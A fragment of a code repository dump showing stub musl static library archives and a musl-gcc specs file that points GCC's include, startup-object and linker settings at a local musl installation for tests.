-------------------------------------------------------------------------------- 1 | ! 2 | -------------------------------------------------------------------------------- /tests/musl/libpthread.a: -------------------------------------------------------------------------------- 1 | ! 2 | -------------------------------------------------------------------------------- /tests/musl/libresolv.a: -------------------------------------------------------------------------------- 1 | ! 2 | -------------------------------------------------------------------------------- /tests/musl/librt.a: -------------------------------------------------------------------------------- 1 | ! 2 | -------------------------------------------------------------------------------- /tests/musl/libutil.a: -------------------------------------------------------------------------------- 1 | ! 2 | -------------------------------------------------------------------------------- /tests/musl/libxnet.a: -------------------------------------------------------------------------------- 1 | ! 2 | -------------------------------------------------------------------------------- /tests/musl/musl-gcc.specs: -------------------------------------------------------------------------------- 1 | %rename cpp_options old_cpp_options 2 | 3 | *cpp_options: 4 | -nostdinc -isystem /home/mbr/repositories/musl-root/include -isystem include%s %(old_cpp_options) 5 | 6 | *cc1: 7 | %(cc1_cpu) -nostdinc -isystem /home/mbr/repositories/musl-root/include -isystem include%s 8 | 9 | *link_libgcc: 10 | -L/home/mbr/repositories/musl-root/lib -L .%s 11 | 12 | *libgcc: 13 | libgcc.a%s %:if-exists(libgcc_eh.a%s) 14 | 15 | *startfile: 16 | %{!shared: /home/mbr/repositories/musl-root/lib/%{pie:S}crt1.o} /home/mbr/repositories/musl-root/lib/crti.o %{shared|pie:crtbeginS.o%s;:crtbegin.o%s} 17 | 18 | *endfile: 19 | %{shared|pie:crtendS.o%s;:crtend.o%s} /home/mbr/repositories/musl-root/lib/crtn.o 20 | 21 | *link: 22 | -dynamic-linker /lib/ld-musl-x86_64.so.1 -nostdlib %{shared:-shared} %{static:-static} %{rdynamic:-export-dynamic} 23 | 24 | *esp_link: 25 | 26 | 27 | *esp_options: 28 | 29 | 30 | *esp_cpp_options: 31 | 32 | 33 | --------------------------------------------------------------------------------